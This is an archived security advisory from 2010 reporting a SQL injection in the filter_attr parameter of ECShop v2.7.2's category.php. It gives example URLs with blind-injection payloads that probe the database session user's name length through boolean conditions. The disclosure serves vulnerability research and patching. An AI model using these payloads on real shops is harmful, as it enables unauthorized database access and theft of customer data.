TUCoPS :: HP Unsorted E :: bt-30106.htm

ECShop apps injection
Injection of ECShop apps.
Injection of ECShop apps.



ECSHOP is one of the most famous shopping apps of china.
 
The last vesion of ECShop is V2.7.2. It has a OR_NUM type injection in filter_attr Parameter of category.php.
 
For example:
 
http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC#goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999 
 
 
 

Test it :
 
http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=14%20or%201=2 
 
http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20OR%20length(session_user())=15%20or%201=2 
 
 
 
 
Liscker
2010.05.07

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH